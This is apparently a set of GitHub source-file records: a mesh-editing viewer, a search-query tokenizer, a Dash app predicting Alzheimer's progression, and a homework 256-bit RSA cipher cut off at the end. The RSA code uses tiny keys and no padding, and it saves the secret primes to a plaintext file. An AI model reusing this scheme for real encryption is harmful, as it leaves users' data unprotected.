igl.eigen.MatrixXd()\n\t\t\teT = igl.eigen.MatrixXi()\n\t\t\teu = igl.eigen.MatrixXd()\n\t\t\teQ = igl.eigen.MatrixXd()\n\t\t\tefix = igl.eigen.MatrixXi()\n\t\t\temov = igl.eigen.MatrixXi()\n\t\t\tes_ind = igl.eigen.MatrixXi()\n\t\t\ter_ind = igl.eigen.MatrixXi()\n\t\t\tu_ind = []\n\t\t\teu_ind = igl.eigen.MatrixXi()\n\n\t\t\tigl.readDMAT(folder+\"V.dmat\", eV)\n\t\t\tigl.readDMAT(folder+\"F.dmat\", eT)\n\t\t\tigl.readDMAT(folder+\"Uvec.dmat\", eu)\n\t\t\tigl.readDMAT(folder+\"Modes.dmat\", eQ)\n\t\t\tigl.readDMAT(folder+\"FixV.dmat\", efix)\n\t\t\tigl.readDMAT(folder+\"MovV.dmat\", emov)\n\t\t\tigl.readDMAT(folder+\"Rclusters.dmat\", er_ind)\n\t\t\tigl.readDMAT(folder+\"SHandles.dmat\", es_ind)\n\t\t\tfor i in range(len_uClusters):\n\t\t\t\tigl.readDMAT(folder+\"uClusters\"+str(i)+\".dmat\", eu_ind)\n\t\t\t\tu_ind.append(e2p(eu_ind)[0,:])\n\n\t\t\tself.mesh = Mesh(read_in = True)\n\t\t\tself.mesh.init_from_file(V=e2p(eV), \n\t\t\t\t\t\t\t\tT=e2p(eT), \n\t\t\t\t\t\t\t\tu=e2p(eu), \n\t\t\t\t\t\t\t\tQ=e2p(eQ), \n\t\t\t\t\t\t\t\tfix=e2p(efix), \n\t\t\t\t\t\t\t\tmov=e2p(emov), \n\t\t\t\t\t\t\t\tr_element_cluster_map=e2p(er_ind), \n\t\t\t\t\t\t\t\ts_handles_ind=e2p(es_ind), \n\t\t\t\t\t\t\t\tu_clusters_element_map= u_ind,\n\t\t\t\t\t\t\t\tmodes_used=modes_used)\n\n\t\t\tprint(\"Done reading DMAT\")\n\n\tdef createMesh(self, modes=None, muscle=True):\n\t\tto_fix = self.Fix\n\t\tto_mov = self.Mov\n\n\t\tself.mesh = Mesh([self.V, self.T, self.U], ito_fix = to_fix, ito_mov=to_mov, read_in= False, modes_used=modes)\n\t\tself.mesh.u, self.uvec, self.eGu, self.UVECS = heat_method(self.mesh)\n\t\tself.mesh.getGlobalF(updateR=False, updateS=False, updateU=True)\n\t\tCAg = self.mesh.getC().dot(self.mesh.getA().dot(self.mesh.x0))\n\t\t# self.uClusters = [[t for t in range(len(self.T)) if CAg[6*t]<=0.1],\n\t\t# \t\t\t\t\t[t for t in range(len(self.T)) if CAg[6*t]>=0.9]]\n\n\t\tself.mesh.u_clusters_element_map = [np.array(list(e), dtype=\"int32\") for e in self.uClusters]\n\n\tdef getMesh(self, name=None, modes_used=None, muscle=True):\n\t\tif name is not None:\n\t\t\tself.read_mesh_setup(name = name, modes_used=modes_used)\n\t\telse:\n\t\t\tself.createMesh(modes=modes_used)\n\t\treturn self.mesh\n\n\tdef display(self):\n\t\tred = igl.eigen.MatrixXd([[1,0,0]])\n\t\tpurple = igl.eigen.MatrixXd([[1,0,1]])\n\t\tgreen = igl.eigen.MatrixXd([[0,1,0]])\n\t\tblack = igl.eigen.MatrixXd([[0,0,0]])\n\t\tblue = igl.eigen.MatrixXd([[0,0,1]])\n\t\twhite = igl.eigen.MatrixXd([[1,1,1]])\n\n\t\trandc = [[random.uniform(0,1), random.uniform(0,1), random.uniform(0,1)] for i in range(10)]\n\n\t\tviewer = igl.glfw.Viewer()\n\t\tdef mouse_up(viewer, btn, bbb):\n\t\t\tif btn==1:\n\t\t\t\tself.middle_button_down = False\n\n\n\t\tdef mouse_down(viewer, btn, bbb):\n\t\t\t# Cast a ray in the view direction starting from the mouse position\n\t\t\tbc = igl.eigen.MatrixXd()\n\t\t\tfid = igl.eigen.MatrixXi(np.array([-1]))\n\t\t\tcoord = igl.eigen.MatrixXd([viewer.current_mouse_x, viewer.core.viewport[3] - viewer.current_mouse_y])\n\t\t\thit = igl.unproject_onto_mesh(coord, viewer.core.view * viewer.core.model,\n\t\t\tviewer.core.proj, viewer.core.viewport, igl.eigen.MatrixXd(self.V), igl.eigen.MatrixXi(self.T), fid, bc)\n\t\t\tind = e2p(fid)[0][0]\n\n\t\t\tif hit and btn==0:\n\t\t\t\t# paint hit red\n\t\t\t\tself.Fix.append(self.T[ind][np.argmax(bc)])\n\t\t\t\tprint(\"fix\",self.T[ind][np.argmax(bc)])\n\t\t\t\treturn True\n\t\t\t\n\t\t\tif hit and btn==2:\n\t\t\t\t# paint hit 
red\n\t\t\t\tself.Mov.append(self.T[ind][np.argmax(bc)])\n\t\t\t\tprint(\"mov\",self.T[ind][np.argmax(bc)])\n\t\t\t\treturn True\n\n\t\t\tif hit and btn==1:\n\t\t\t\tself.middle_button_down = True\n\t\t\t\tself.uClusters.append(set())\n\t\t\t\tself.uClusterNum += 1\n\t\t\t\treturn True\n\t\t\t\n\t\t\treturn False\n\n\t\tdef mouse_move(viewer, mx, my):\n\t\t\tif self.middle_button_down:\n\t\t\t\t# Cast a ray in the view direction starting from the mouse position\n\t\t\t\tbc = igl.eigen.MatrixXd()\n\t\t\t\tfid = igl.eigen.MatrixXi(np.array([-1]))\n\t\t\t\tcoord = igl.eigen.MatrixXd([viewer.current_mouse_x, viewer.core.viewport[3] - viewer.current_mouse_y])\n\t\t\t\thit = igl.unproject_onto_mesh(coord, viewer.core.view * viewer.core.model,\n\t\t\t\tviewer.core.proj, viewer.core.viewport, igl.eigen.MatrixXd(self.V), igl.eigen.MatrixXi(self.T), fid, bc)\n\t\t\t\tind = e2p(fid)[0][0]\n\t\t\t\tself.uClusters[self.uClusterNum].add(ind)\n\t\t\t\treturn True\n\n\n\t\tdef key_down(viewer,aaa, bbb):\n\t\t\tif(aaa == 65):\n\t\t\t\tself.createMesh(modes=self.modes_used)\n\t\t\tif(aaa == 83):\n\t\t\t\tself.save_mesh_setup(name=\"test2x2\")\n\n\t\t\tviewer.data().clear()\n\t\t\tif self.uvec is None:\n\t\t\t\tnV = self.V#np.concatenate((self.V, np.zeros((len(self.V),1))), axis =1)\n\t\t\telse:\n\t\t\t\t#3d Heat Gradient\n\t\t\t\tnV = self.V#np.concatenate((self.V, np.zeros((len(self.V),1))), axis =1)\n\t\t\t\t# print(self.mesh.V.shape, self.uvec.shape)\n\t\t\t\t# nV = np.concatenate((self.mesh.V, self.uvec[:,np.newaxis]), axis=1)\n\t\t\t\t# BC = igl.eigen.MatrixXd()\n\t\t\t\t# igl.barycenter(igl.eigen.MatrixXd(nV), igl.eigen.MatrixXi(self.T), BC)\n\t\t\t\t# GU_mag = self.eGu.rowwiseNorm()\n\t\t\t\t# max_size = igl.avg_edge_length(igl.eigen.MatrixXd(nV), igl.eigen.MatrixXi(self.T)) / GU_mag.mean()\n\t\t\t\t# viewer.data().add_edges(BC, BC + max_size*self.eGu, black)\n\t\n\t\t\tviewer.data().set_mesh(igl.eigen.MatrixXd(nV), igl.eigen.MatrixXi(self.T))\n\n\t\t\tif self.mesh is not None:\n\t\t\t\tColors = np.ones(self.mesh.T.shape)\n\t\t\t\tif (aaa==82):\n\t\t\t\t\tfor i in range(len(self.mesh.T)): \n\t\t\t\t\t\tcolor = black\n\t\t\t\t\t\tColors[i,:] = randc[self.mesh.r_element_cluster_map[i]]\n\t\t\t\telif(aaa==67):\n\t\t\t\t\tfor i in range(len(self.mesh.u_clusters_element_map)):\n\t\t\t\t\t\tfor j in range(len(self.mesh.u_clusters_element_map[i])):\n\t\t\t\t\t\t\tk = self.mesh.u_clusters_element_map[i][j]\n\t\t\t\t\t\t\tColors[k,:] = randc[i]\n\t\t\t\tColors[np.array([self.mesh.s_handles_ind]),:] = np.array([0,0,0])\n\t\t\t\tviewer.data().set_colors(igl.eigen.MatrixXd(np.array(Colors)))\n\n\t\t\tif not self.mesh is None:\n\t\t\t\tCAg = self.mesh.getC().dot(self.mesh.getA().dot(self.mesh.x0))\n\t\t\t\tprint(self.mesh.u)\n\t\t\t\tfor i in range(len(self.T)):\n\t\t\t\t\tC = np.matrix([CAg[6*i:6*i+2],CAg[6*i:6*i+2]])\n\t\t\t\t\tU = np.multiply(self.mesh.getU(i), np.array([[0.25],[0.25]])) + C\n\t\t\t\t\tviewer.data().add_edges(igl.eigen.MatrixXd(C[0,:]), igl.eigen.MatrixXd(U[0,:]), black)\n\n\t\tdef pre_draw(viewer):\n\t\t\tfixed_pts = []\n\t\t\tfor i in range(len(self.Fix)):\n\t\t\t\tfixed_pts.append(self.V[self.Fix[i]])\n\t\t\tviewer.data().add_points(igl.eigen.MatrixXd(np.array(fixed_pts)), red)\n\n\t\t\tmov_pts = []\n\t\t\tfor i in range(len(self.Mov)):\n\t\t\t\tmov_pts.append(self.V[self.Mov[i]])\n\t\t\tviewer.data().add_points(igl.eigen.MatrixXd(np.array(mov_pts)), green)\n\t\t\t\n\t\t\t# viewer.data().add_points(igl.eigen.MatrixXd(np.array(shit)), purple)\n\n\t\tkey_down(viewer, \"b\", 
123)\n\t\tviewer.callback_mouse_down = mouse_down\n\t\tviewer.callback_key_down = key_down\n\t\tviewer.callback_mouse_up = mouse_up\n\t\tviewer.callback_mouse_move = mouse_move\n\t\tviewer.callback_pre_draw = pre_draw\n\t\tviewer.core.is_animating = False\n\t\tviewer.launch()\n\n\n","repo_name":"itsvismay/ElasticFEM","sub_path":"Scripts/Meshwork.py","file_name":"Meshwork.py","file_ext":"py","file_size_in_byte":10005,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16992975104","text":"import re\r\nfrom nltk.corpus import stopwords\r\nimport gensim.downloader as api\r\nfrom collections import Counter\r\n\r\nmodel = api.load(\"glove-wiki-gigaword-50\")\r\n\r\n\r\nenglish_stopwords = frozenset(stopwords.words('english'))\r\nRE_WORD = re.compile(r\"\"\"[\\#\\@\\w](['\\-]?\\w){2,24}\"\"\", re.UNICODE)\r\ncorpus_stopwords = [\"category\", \"references\", \"also\", \"external\", \"links\",\r\n \"may\", \"first\", \"see\", \"history\", \"people\", \"one\", \"two\",\r\n \"part\", \"thumb\", \"including\", \"second\", \"following\",\r\n \"many\", \"however\", \"would\", \"became\"]\r\nour = [\"why\",\"how\",\"what\",\"make\"]\r\nall_stopwords = english_stopwords.union(corpus_stopwords)\r\nour_stopwords = all_stopwords.union(our)\r\n\r\n\r\n# from hw1\r\ndef get_html_pattern():\r\n return \"(\\<[^\\<]+\\>)\"\r\n\r\ndef get_date_pattern():\r\n m_31_days = 'January|Jan|March|Mar|May|July|Jul|August|Aug|October|Oct|December|Dec'\r\n d_31_days = '([1-9]|3[10]|[12]\\d)'\r\n m_30_days = 'April|Apr|June|Jun|September|Sep|November|Nov'\r\n d_30_days = '([1-9]|30|[12]\\d)'\r\n m_29_days = 'February|Feb'\r\n d_29_days = '([1-9]|[12]\\d)'\r\n year = '\\d*'\r\n return f\"(?i)(({m_31_days})\\s{d_31_days}\\,\\s{year})|({d_31_days}\\s({m_31_days})\\s{year})|(({m_30_days})\\s{d_30_days}\\,\\s{year})|({d_30_days}\\s({m_30_days})\\s{year})|(({m_29_days})\\s{d_29_days}\\,\\s{year})|({d_29_days}\\s({m_29_days})\\s{year})\"\r\ndef get_time_pattern():\r\n secmin = '([0-5]\\d)'\r\n hours = '([0-1]\\d)'\r\n no_chars = '(?![A-Za-z0-9])'\r\n no_chars_start = '(?<![A-Za-z0-9])'\r\n return f\"({hours}[\\.]{secmin}(AM|PM){no_chars})|({hours}{secmin}(p\\.m\\.|a\\.m\\.){no_chars})|{no_chars_start}([1-9]\\:{secmin}\\:{secmin}){no_chars}|{no_chars_start}(([1]\\d)\\:{secmin}\\:{secmin}){no_chars}|{no_chars_start}(([2][0-3])\\:{secmin}\\:{secmin}){no_chars}\"\r\n\r\ndef get_percent_pattern():\r\n return \"(?:(?<=\\s|\\())[\\+\\-]?\\d{1,3}(,\\d{3})*(\\.\\d+)?[%](?=(|\\,|\\.|\\:)?(\\s|$))\"\r\n\r\ndef get_number_pattern():\r\n return \"(?:(?<=\\s|\\())[\\+\\-]?\\d{1,3}(,\\d{3})*(\\.\\d+)?(?=(|\\,|\\.|\\:)?(\\s|$))|^\\d+(?=\\s)\"\r\n\r\ndef get_word_pattern():\r\n return \"(?:(?<=\\s)|(?<=^))(([a-zA-Z]+[\\']*[a-zA-Z]*)+\\-*)*([a-zA-Z]+[\\']*[a-zA-Z]*)?\"\r\n\r\nRE_TOKENIZE = re.compile(rf\"\"\"\r\n(\r\n # parsing html tags\r\n (?P<HTMLTAG>{get_html_pattern()}) \r\n # dates\r\n |(?P<DATE>{get_date_pattern()})\r\n # time\r\n |(?P<TIME>{get_time_pattern()})\r\n # Percents\r\n |(?P<PERCENT>{get_percent_pattern()})\r\n # Words\r\n |(?P<WORD>{get_word_pattern()})\r\n # space\r\n |(?P<SPACE>[\\s\\t\\n]+) \r\n # everything else\r\n |(?P<OTHER>.))\"\"\", re.MULTILINE | re.IGNORECASE | re.VERBOSE | re.UNICODE)\r\n\r\n\r\ndef tokenize(text):\r\n \"\"\"\r\n This function aims in tokenize a text into a list of tokens. 
Moreover, it filter stopwords based on our stop words list.\r\n Parameters:\r\n -----------\r\n text: string , represting the text to tokenize.\r\n Returns:\r\n -----------\r\n list of tokens (e.g., list of tokens).\r\n \"\"\"\r\n tokens = [token.group() for token in RE_WORD.finditer(text.lower())]\r\n return [token for token in tokens if token not in our_stopwords]\r\n\r\ndef query_extension(query):\r\n \"\"\"\r\n This function extend the given query using glove model (adding similar words to the query)\r\n Parameters:\r\n -----------\r\n text: string , represting the text to tokenize.\r\n Returns:\r\n -----------\r\n extended list of tokens (e.g., list of tokens).\r\n \"\"\"\r\n\r\n extend_query = []\r\n for token in query:\r\n try:\r\n to_add = []\r\n similar = model.most_similar(token)\r\n if len(similar) >= 1:\r\n to_add.append(similar[0][0])\r\n if len(similar) > 1:\r\n to_add.append(similar[1][0])\r\n except:\r\n continue\r\n extend_query.extend(to_add)\r\n return query + extend_query\r\n\r\n\r\ndef hw3_tokenize(text):\r\n \"\"\"\r\n This function aims in tokenize a text into a list of tokens. Moreover, it filter stopwords.\r\n Parameters:\r\n -----------\r\n text: string , represting the text to tokenize.\r\n Returns:\r\n -----------\r\n list of tokens (e.g., list of tokens).\r\n \"\"\"\r\n tokens = [token.group() for token in RE_WORD.finditer(text.lower())]\r\n tokens_no_stop = [token for token in tokens if token not in all_stopwords]\r\n return tokens_no_stop\r\n","repo_name":"noaradin1/Information-Retreival-Project","sub_path":"query_preprocess.py","file_name":"query_preprocess.py","file_ext":"py","file_size_in_byte":4297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28879401922","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Sep 23 11:25:47 2020\n\n@author: viceva\n\"\"\"\nimport base64\nimport io\nfrom urllib.parse import quote\n\nimport dash\nfrom dash.dependencies import Input, Output, State\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport dash_table\nimport plotly.express as px\nimport pandas as pd\nfrom src.predict_model import feat_selection, predict_AD, feature_check, which_tests,predict_survival\n\ndff = pd.read_csv('data/raw/dummy.csv')\ncsv_string = dff.to_csv(encoding='utf-8', index=False)\ncsv_string = \"data:text/csv;charset=utf-8,\" + quote(csv_string)\n\nexternal_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']\n\napp = dash.Dash(__name__, external_stylesheets=external_stylesheets, suppress_callback_exceptions=True, prevent_initial_callbacks=True)\n\nserver = app.server\n\napp.layout = html.Div(children=[\n html.H1(children='Target AD',style = {'width': '100%', 'display': 'flex', 'align-items': 'center', 'justify-content': 'center'}),\n html.Div(children='''\n A batch screening tool to focus early clinical trials of Alzheimer's Disease. This tool predicts which mild cognitive impaired patients are most likely to develop Alzheimer's\n ''',style = {'width': '100%', 'display': 'flex', 'align-items': 'center', 'justify-content': 'center', 'padding': 10}),\n html.P(['1) Download the template below to structure your data. The template contains dummy values for you to replace, test names should not be changed. 
If you are unfamiliar with the test name, use the Variable Lookup search.', html.Br()], style = {'width': '80%', 'align-items': 'center', 'justify-content': 'center','margin': '20px','margin-left': '135px' ,'display': 'flex'}),\n html.A(\n 'Download Template',\n id='download-link',\n download=\"template.csv\",\n href=csv_string,\n target=\"_blank\"\n , style = {'width': '100%', 'display': 'flex', 'align-items': 'center', 'justify-content': 'center'}),\n \n dcc.Upload(\n id='upload-data',\n children=html.Div([\n '2) Upload your .csv or .xlm patient file: Drag and Drop or ',\n html.A('Select Files'),'. After dropping your file, a table and chart with results will be displayed'\n ]),\n style={\n 'width': '80%',\n 'align-items': 'center', 'justify-content': 'center',\n 'height': '60px',\n 'lineHeight': '60px',\n 'borderWidth': '1px',\n 'borderStyle': 'dashed',\n 'borderRadius': '5px',\n 'textAlign': 'center',\n 'margin': '20px' ,\n 'margin-left': '135px',\n },\n # Allow multiple files to be uploaded\n multiple=False\n ),\n \n \n html.Div([html.Div('''3) OPTIONAL. Select model threshold. Lower values will include more patients into the pool, but increases false negatives. Default value is optimized for tradeoff.'''),\n dcc.Slider(\n id='Model precision',\n min=0.25,\n max=.75,\n step=.001,\n value=.5,\n marks={\n .25: '.25',\n .35: '.35',\n .45: '.45',\n .55: '.55',\n .65: '.65',\n .75: '.75',\n\n },\n tooltip = { 'always_visible': False, 'placement':'bottom' }\n ),\n \n html.Div(id='slider-output-container'),\n ],style={'marginBottom': 50,'marginTop': 50,'width': '80%', 'margin-left': '135px'}),\n \n html.Div([html.Div('''4) Select time from first visit in days. It will update the likelihood (ranging form 0-not very likely to 1-very likely) for a patient to be diagnosed with Alzheimer's by this timepoint.'''),\n dcc.Slider(\n id='Time point',\n min=150,\n max=550,\n step=10,\n value=365,\n marks={\n 150: '150',\n 250: '250',\n 350: '350',\n 450: '450',\n 550: '550',\n },\n tooltip = { 'always_visible': False, 'placement':'bottom' }\n ),\n \n html.Div(id='slider-output-container2'),\n ],style={'marginBottom': 50,'marginTop': 50, 'width': '80%', 'margin-left': '135px'}),\n \n \n html.Div(id='output-data-upload',\n style = {'width': '100%', 'align-items': 'center', 'justify-content': 'center', 'margin-left': '205px'}), \n \n \n html.Div([\n html.I([\"Variable Lookup:\",html.Br(), \"Input the name of the variable you want more information about.A description and accepted values for this test will be displayed\"]),\n html.Br(),\n dcc.Input(id=\"input1\", type=\"text\", placeholder=\"\", debounce=True),\n\n html.Div(id=\"output\", style = {'width': '100%', 'margin': '5px', 'margin-left': '185px'}),\n ] , style = {'width': '100%', 'align-items': 'center', 'justify-content': 'center','textAlign': 'center'}, className=\"one column\"),\n \n\n \n # Hidden div inside the app that stores the intermediate value\n html.Div(id='intermediate-value', style={'display': 'none'}),\n \n])\n \n@app.callback(\n Output(\"output\", \"children\"),\n [Input(\"input1\", \"value\")],\n)\ndef update_output(input1):\n if input1:\n dd= pd.read_csv('docs/rdd_datadictionary_uds.csv')\n answer=dd[['ShortDescriptor','AllowableCodes']].loc[dd.VariableName==input1]\n \n search_table = html.Div()\n search_table = html.Div([\n dash_table.DataTable(\n data=answer.to_dict('records'),\n columns=[{'name': i, 'id': i} for i in answer.columns],\n style_cell={\n 'whiteSpace': 'normal',\n 'height': 'auto',\n 'maxWidth': 40,\n \n },\n 
style_table={\n                    'width': 800\n                },\n            ),\n            #html.Hr()\n        ])\n        return search_table \n\ndef parse_contents(contents, filename, date):\n    content_type, content_string = contents.split(',')\n\n    decoded = base64.b64decode(content_string)\n    try:\n        if 'csv' in filename:\n            # Assume that the user uploaded a CSV file\n            df = pd.read_csv(\n                io.StringIO(decoded.decode('utf-8')))\n        elif 'xls' in filename:\n            # Assume that the user uploaded an excel file\n            df = pd.read_excel(io.BytesIO(decoded))\n        elif 'txt' in filename or 'tsv' in filename:\n            # Assume that the user uploaded a whitespace-delimited text file\n            df = pd.read_csv(\n                io.StringIO(decoded.decode('utf-8')), delimiter = r'\\s+')\n    except Exception as e:\n        print(e)\n        return html.Div([\n            'There was an error processing this file.'\n        ])\n\n    return df \n\n\n\n@app.callback(Output('intermediate-value', 'children'), \n              [Input('upload-data', 'contents')],\n              [State('upload-data', 'filename'),\n               State('upload-data', 'last_modified')])\n\ndef clean_data(contents, filename, date):\n    if contents:\n        df = parse_contents(contents, filename, date)\n        return df.to_json(orient='split')\n\n\n@app.callback(Output('output-data-upload', 'children'),\n              [Input('intermediate-value', 'children'),\n               Input('Model precision', 'value'),\n               Input('Time point', 'value')]) \n\ndef update_table(jsonified_data, slider_value, time_value):\n    \n    if jsonified_data:\n        table = html.Div()\n        \n        dff = pd.read_json(jsonified_data, orient='split')\n        df_subset=feat_selection(dff, 'models/01final_features_res.sav')\n        tests_df, model_df=feature_check(df_subset)\n        predictions=predict_AD(model_df, 'models/rf_best.sav', slider_value)\n        surv_df=predict_survival(model_df, 'models/surv_model.sav', threshold=time_value)\n        \n        merged_ps=predictions.join(surv_df.set_index('Patient ID'), on='Patient ID')\n        merged_ps.loc[merged_ps['Include'] =='No', 'Likely diagnosis'] = 'Not applicable'\n        \n        needed_tests=which_tests(tests_df)\n        merged_table=pd.concat([merged_ps,needed_tests])\n        merged_table=merged_table.fillna('All completed')\n        \n        figure=px.bar(merged_table[['Patient ID', 'Include' ]].groupby('Include').count(),color_discrete_sequence=px.colors.qualitative.Pastel2)\n        figure.update_layout(showlegend=False)\n        \n        table = html.Div([html.P('Note: Patients highlighted in green can be selected for the clinical trial. If orange, the tests indicated need to be performed before a prediction can be given. The table can be sorted, filtered, modified and downloaded. 
The distribution is shown in the graph', style = {'width': '70%'}),\n \n html.Div([dash_table.DataTable(\n data=merged_table.to_dict('records'),\n columns=[{'name': i, 'id': i} for i in merged_table.columns],\n editable=True,\n id='data-table',\n style_data_conditional=[\n {\n 'if': {\n 'filter_query': '{Include} = Yes', \n },\n 'backgroundColor': 'rgb(179,226,205)', \n },\n {\n 'if': {\n 'filter_query': '{Include} = `Tests needed`', \n },\n 'backgroundColor': 'rgb(253,205,172)', \n }],\n \n style_table={\n 'height': 400,\n #'overflowY': 'scroll',\n 'width': 400\n },\n style_cell={\n 'whiteSpace': 'normal',\n 'height': 'auto',\n 'minWidth': 80,\n 'textAlign': 'left'\n\n },\n style_filter = {'height':'25px'}, \n filter_action=\"native\",\n fixed_rows={'headers': True},\n sort_action=\"native\",\n page_action='native',\n sort_mode=\"multi\",\n export_columns='all',\n export_format='csv',\n export_headers ='names',\n ),\n \n \n ], className=\"four columns\"),\n \n\n html.Div([dcc.Graph(id='example-graph',\n figure=figure),\n ], className=\"five columns\")\n \n ], style={ 'margin-bottom':'55px'})\n return table\n\n\n\n\nif __name__ == '__main__':\n app.run_server(debug=True)","repo_name":"vicvarE/AD-Dash","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":10257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33851713511","text":"#####################################\n# 256 Bit RSA Cipher by Vikram Manja\n#####################################\n\nfrom BitVector import *\nimport sys\nimport random\n\nimport random\n\n############################ class PrimeGenerator by Avi Kak ##############################\nclass PrimeGenerator( object ): #(A1)\n\n def __init__( self, **kwargs ): #(A2)\n bits = debug = None #(A3)\n if 'bits' in kwargs : bits = kwargs.pop('bits') #(A4)\n if 'debug' in kwargs : debug = kwargs.pop('debug') #(A5)\n self.bits = bits #(A6)\n self.debug = debug #(A7)\n self._largest = (1 << bits) - 1 #(A8)\n\n def set_initial_candidate(self): #(B1)\n candidate = random.getrandbits( self.bits ) #(B2)\n if candidate & 1 == 0: candidate += 1 #(B3)\n candidate |= (1 << self.bits-1) #(B4)\n candidate |= (2 << self.bits-3) #(B5)\n self.candidate = candidate #(B6)\n\n def set_probes(self): #(C1)\n self.probes = [2,3,5,7,11,13,17] #(C2)\n\n # This is the same primality testing function as shown earlier\n # in Section 11.5.6 of Lecture 11:\n def test_candidate_for_prime(self): #(D1)\n 'returns the probability if candidate is prime with high probability'\n p = self.candidate #(D2)\n if p == 1: return 0 #(D3)\n if p in self.probes: #(D4)\n self.probability_of_prime = 1 #(D5)\n return 1 #(D6)\n if any([p % a == 0 for a in self.probes]): return 0 #(D7)\n k, q = 0, self.candidate-1 #(D8)\n while not q&1: #(D9)\n q >>= 1 #(D10)\n k += 1 #(D11)\n if self.debug: print(\"q = %d k = %d\" % (q,k)) #(D12)\n for a in self.probes: #(D13)\n a_raised_to_q = pow(a, q, p) #(D14)\n if a_raised_to_q == 1 or a_raised_to_q == p-1: continue #(D15)\n a_raised_to_jq = a_raised_to_q #(D16)\n primeflag = 0 #(D17)\n for j in range(k-1): #(D18)\n a_raised_to_jq = pow(a_raised_to_jq, 2, p) #(D19)\n if a_raised_to_jq == p-1: #(D20)\n primeflag = 1 #(D21)\n break #(D22)\n if not primeflag: return 0 #(D23)\n self.probability_of_prime = 1 - 1.0/(4 ** len(self.probes)) #(D24)\n return self.probability_of_prime #(D25)\n\n def findPrime(self): #(E1)\n self.set_initial_candidate() #(E2)\n if self.debug: print(\" candidate is: %d\" % 
self.candidate) #(E3)\n self.set_probes() #(E4)\n if self.debug: print(\" The probes are: %s\" % str(self.probes)) #(E5)\n max_reached = 0 #(E6)\n while 1: #(E7)\n if self.test_candidate_for_prime(): #(E8)\n if self.debug: #(E9)\n print(\"Prime number: %d with probability %f\\n\" %\n (self.candidate, self.probability_of_prime) ) #(E10)\n break #(E11)\n else: #(E12)\n if max_reached: #(E13)\n self.candidate -= 2 #(E14)\n elif self.candidate >= self._largest - 2: #(E15)\n max_reached = 1 #(E16)\n self.candidate -= 2 #(E17)\n else: #(E18)\n self.candidate += 2 #(E19)\n if self.debug: #(E20)\n print(\" candidate is: %d\" % self.candidate) #(E21)\n return self.candidate #(E22)\n\n##############################################################################\n\ne = 65537\n\ndef chinese_remainder_theorem(c, d, p, q):\n \"\"\"\n Returns c^d mod (p*q) using chinese remainders\n \"\"\"\n vp = gme(int(c), int(d), p)\n vq = gme(int(c), int(d), q)\n xp = q * int(BitVector(intVal=q, size=128).multiplicative_inverse(BitVector(intVal=p)))\n xq = p * int(BitVector(intVal=p, size=128).multiplicative_inverse(BitVector(intVal=q)))\n\n return (vp*xp + vq*xq) % (p*q)\n\ndef coprime(a,b):\n if (b < a): a,b = b,a\n while b:\n a, b = b, a % b\n if (a==1):return True\n else: return False\n\ndef get_two_primes():\n generator = PrimeGenerator(bits=128)\n p = generator.findPrime()\n q = generator.findPrime()\n # check not equal\n if (p==q): return get_two_primes()\n # check coprime\n if not coprime(p-1,e): return get_two_primes()\n if not coprime(q-1,e): return get_two_primes()\n return p,q\n\ndef gme(a,b,n):\n \"\"\"\n General Modular Exponentiation\n Returns a^b mod n\n \"\"\"\n result = 1\n while b > 0:\n if b & 1:\n result = (result * a) % n\n b = b >> 1\n a = (a * a) % n\n return int(result)\n\ndef encrypt(message_file, output_file):\n output = open(output_file, \"w\")\n p,q = get_two_primes()\n # SAVE p and q\n with open(\"pq.txt\", \"w\") as pq:\n for i in [p, \" \", q]: pq.write(str(i))\n n = p * q\n bv = BitVector(filename=message_file)\n while bv.more_to_read:\n # Read 128 bits\n bv_out = bv.read_bits_from_file(128)\n # Right pad with newlines (ascii=10)\n while(len(bv_out) < 128):\n bv_out += BitVector(intVal=10, size=8)\n # m^e mod n (e is small so 'gme' suffices --> gme is equivalent to 'pow')\n bv_out = BitVector(intVal=gme(int(bv_out), e, n))\n # Left pad with 0s\n if (len(bv_out)) < 256:\n bv_out = BitVector(size=256-len(bv_out)) + bv_out\n # Write crypt text\n output.write(bv_out.get_bitvector_in_hex())\n output.close()\n\ndef decrypt(encrypted_file, decrypted_file):\n dec = open(decrypted_file, \"w\")\n # GET p and q\n p,q = (int(i) for i in open(\"pq.txt\", \"r\").read().split())\n totient = (p-1) * (q-1)\n d = BitVector(intVal=e).multiplicative_inverse(BitVector(intVal=totient))\n bv = BitVector(filename=encrypted_file)\n while bv.more_to_read:\n # Read & Translate Bitvector from hexstring\n bv_out = bv.read_bits_from_file(512)\n bv_out = BitVector(hexstring=bv_out.get_bitvector_in_ascii())\n # Use Chinese Remainder Theorem to get C^d\n bv_out = BitVector(intVal=chinese_remainder_theorem(bv_out, d, p, q),size=256)\n # Remove '0' padding\n bv_out = bv_out[128:]\n # Write Plain Text\n dec.write(bv_out.get_bitvector_in_ascii())\n dec.close()\n\nif __name__ == \"__main__\":\n if(len(sys.argv) < 4):\n print(\"Error: requires 3 inputs\")\n sys.exit()\n if(sys.argv[1] == \"-e\"):\n encrypt(sys.argv[2], sys.argv[3])\n if(sys.argv[1] == \"-d\"):\n decrypt(sys.argv[2], sys.argv[3])\n\n# Example:\n# pq.txt = 
